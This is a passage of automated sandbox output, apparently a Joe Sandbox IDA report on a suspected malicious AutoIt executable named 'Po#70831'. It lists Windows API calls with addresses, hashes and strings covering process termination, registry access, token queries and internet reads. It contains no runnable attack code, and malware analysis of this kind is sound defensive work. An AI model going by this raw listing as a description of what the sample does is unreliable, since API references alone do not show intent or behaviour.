                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004F524F
                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 004F5261
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00491BF4
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00491BFC
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00491C07
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00491C12
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00491C1A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00491C22
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004FEB30
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004FEB46
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 004FEB55
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB64
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB6E
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB75
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      APIs
                                      • GetClientRect.USER32(?), ref: 004E7452
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 004E7469
                                      • GetWindowDC.USER32(?), ref: 004E7475
                                      • GetPixel.GDI32(00000000,?,?), ref: 004E7484
                                      • ReleaseDC.USER32(?,00000000), ref: 004E7496
                                      • GetSysColor.USER32(00000005), ref: 004E74B0
                                      Similarity
                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                      • String ID:
                                      • API String ID: 272304278-0
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004F187F
                                      • UnloadUserProfile.USERENV(?,?), ref: 004F188B
                                      • CloseHandle.KERNEL32(?), ref: 004F1894
                                      • CloseHandle.KERNEL32(?), ref: 004F189C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F18A5
                                      • HeapFree.KERNEL32(00000000), ref: 004F18AC
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0049BEB3
                                      Strings
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: D%V$D%V$D%V$D%VD%V
                                      • API String ID: 1385522511-527429927
                                      APIs
                                        • Part of subcall function 004B0242: EnterCriticalSection.KERNEL32(0056070C,00561884,?,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B024D
                                        • Part of subcall function 004B0242: LeaveCriticalSection.KERNEL32(0056070C,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B028A
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      • __Init_thread_footer.LIBCMT ref: 00517BFB
                                        • Part of subcall function 004B01F8: EnterCriticalSection.KERNEL32(0056070C,?,?,004A8747,00562514), ref: 004B0202
                                        • Part of subcall function 004B01F8: LeaveCriticalSection.KERNEL32(0056070C,?,004A8747,00562514), ref: 004B0235
                                      Strings
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                      • String ID: +TN$5$G$Variable must be of type 'Object'.
                                      • API String ID: 535116098-2238542796
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004FC6EE
                                      • _wcslen.LIBCMT ref: 004FC735
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004FC79C
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004FC7CA
                                      Strings
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default
                                      • String ID: 0
                                      • API String ID: 1227352736-4108050209
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0051AEA3
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • GetProcessId.KERNEL32(00000000), ref: 0051AF38
                                      • CloseHandle.KERNEL32(00000000), ref: 0051AF67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                      • String ID: <$@
                                      • API String ID: 146682121-1426351568
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F7206
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F723C
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F724D
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F72CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      APIs
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00522F8D
                                      • LoadLibraryW.KERNEL32(?), ref: 00522F94
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00522FA9
                                      • DestroyWindow.USER32(?), ref: 00522FB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                      • String ID: SysAnimate32
                                      • API String ID: 3529120543-1011021900
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004B4D1E,004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002), ref: 004B4D8D
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B4DA0
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,004B4D1E,004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000), ref: 004B4DC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E9C
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00494EAE
                                      • FreeLibrary.KERNEL32(00000000,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-3689287502
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E62
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494E74
                                      • FreeLibrary.KERNEL32(00000000,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-1355242751
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 0051A427
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0051A435
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0051A468
                                      • CloseHandle.KERNEL32(?), ref: 0051A63D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00533700), ref: 004CBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0056121C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00561270,000000FF,?,0000003F,00000000,?), ref: 004CBC36
                                      • _free.LIBCMT ref: 004CBB7F
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      APIs
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004FCF22,?), ref: 004FDDFD
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004FCF22,?), ref: 004FDE16
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • lstrcmpiW.KERNEL32(?,?), ref: 004FE473
                                      • MoveFileW.KERNEL32(?,?), ref: 004FE4AC
                                      • _wcslen.LIBCMT ref: 004FE5EB
                                      • _wcslen.LIBCMT ref: 004FE603
                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004FE650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                      • String ID:
                                      • API String ID: 3183298772-0
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051BAA5
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051BB00
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0051BB63
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0051BBA6
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051BBB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 826366716-0
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 004F8BCD
                                      • VariantClear.OLEAUT32 ref: 004F8C3E
                                      • VariantClear.OLEAUT32 ref: 004F8C9D
                                      • VariantClear.OLEAUT32(?), ref: 004F8D10
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F8D3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00508BAE
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00508BDA
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00508C32
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00508C57
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00508C5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00518F40
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00518FD0
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00518FEC
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00519032
                                      • FreeLibrary.KERNEL32(00000000), ref: 00519052
                                        • Part of subcall function 004AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00501043,?,7644E610), ref: 004AF6E6
                                        • Part of subcall function 004AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004EFA64,00000000,00000000,?,?,00501043,?,7644E610,?,004EFA64), ref: 004AF70D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      APIs
                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00526C33
                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00526C4A
                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00526C73
                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0050AB79,00000000,00000000), ref: 00526C98
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00526CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Long$MessageSendShow
                                      • String ID:
                                      • API String ID: 3688381893-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004A9141
                                      • ScreenToClient.USER32(00000000,?), ref: 004A915E
                                      • GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                      • GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      APIs
                                      • GetInputState.USER32 ref: 005038CB
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00503922
                                      • TranslateMessage.USER32(?), ref: 0050394B
                                      • DispatchMessageW.USER32(?), ref: 00503955
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00503966
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                      • String ID:
                                      • API String ID: 2256411358-0
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0050CF38
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0050CF6F
                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFB4
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFC8
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 3191363074-0
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 004F1915
                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 004F19C1
                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 004F19C9
                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 004F19DA
                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004F19E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      APIs
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00525745
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0052579D
                                      • _wcslen.LIBCMT ref: 005257AF
                                      • _wcslen.LIBCMT ref: 005257BA
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00525816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen
                                      • String ID:
                                      • API String ID: 763830540-0
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00510951
                                      • GetForegroundWindow.USER32 ref: 00510968
                                      • GetDC.USER32(00000000), ref: 005109A4
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 005109B0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 005109E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 004CCDC6
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004CCDE9
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004CCE0F
                                      • _free.LIBCMT ref: 004CCE22
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004CCE31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                      • SelectObject.GDI32(?,00000000), ref: 004A96A2
                                      • BeginPath.GDI32(?), ref: 004A96B9
                                      • SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      APIs
                                      Similarity
                                      • API ID: _memcmp
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6), ref: 004C2DFD
                                      • _free.LIBCMT ref: 004C2E32
                                      • _free.LIBCMT ref: 004C2E59
                                      • SetLastError.KERNEL32(00000000,00491129), ref: 004C2E66
                                      • SetLastError.KERNEL32(00000000,00491129), ref: 004C2E6F
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?,?,004F035E), ref: 004F002B
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0046
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0054
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?), ref: 004F0064
                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0070
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004FE997
                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 004FE9A5
                                      • Sleep.KERNEL32(00000000), ref: 004FE9AD
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004FE9B7
                                      • Sleep.KERNEL32 ref: 004FE9F3
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F0FCA
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F0FD6
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F0FE5
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F0FEC
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F1002
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F102A
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F1036
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1045
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F104C
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1062
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500324
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500331
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 0050033E
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 0050034B
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500358
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500365
                                      Similarity
                                      • API ID: CloseHandle
                                      APIs
                                      • _free.LIBCMT ref: 004CD752
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CD764
                                      • _free.LIBCMT ref: 004CD776
                                      • _free.LIBCMT ref: 004CD788
                                      • _free.LIBCMT ref: 004CD79A
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 004F5C58
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 004F5C6F
                                      • MessageBeep.USER32(00000000), ref: 004F5C87
                                      • KillTimer.USER32(?,0000040A), ref: 004F5CA3
                                      • EndDialog.USER32(?,00000001), ref: 004F5CBD
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: dece5c69db090dbfe2fa34c49a7fcba93c91ee8a31d5c8cad07b1d1acb3ef1f0
                                      • Instruction ID: c1a6ea62613d1c8b25c27a909f37c70ea377b45350dd4d60bcccc9065a6fa2a0
                                      • Opcode Fuzzy Hash: dece5c69db090dbfe2fa34c49a7fcba93c91ee8a31d5c8cad07b1d1acb3ef1f0
                                      • Instruction Fuzzy Hash: 1B01D630500B48ABFB305B14DD4EFBA7BB8FF11B05F00015AA383A11E1DBF4A9899A95
                                      APIs
                                      • _free.LIBCMT ref: 004C22BE
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004C22D0
                                      • _free.LIBCMT ref: 004C22E3
                                      • _free.LIBCMT ref: 004C22F4
                                      • _free.LIBCMT ref: 004C2305
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: e843f8f6a5808220ecab006c45b3ba31ae52c7e5f74971beb3af48aa1b8ededb
                                      • Instruction ID: 82c3bd9f058cf0c8a294fd32a82eb158acff1bcaa30d9ed94f346586f78a53b4
                                      • Opcode Fuzzy Hash: e843f8f6a5808220ecab006c45b3ba31ae52c7e5f74971beb3af48aa1b8ededb
                                      • Instruction Fuzzy Hash: 83F017FC9406209F8652AF5AAD11E1A7EA4B739761704250FF410D33B1CBF80919FAAC
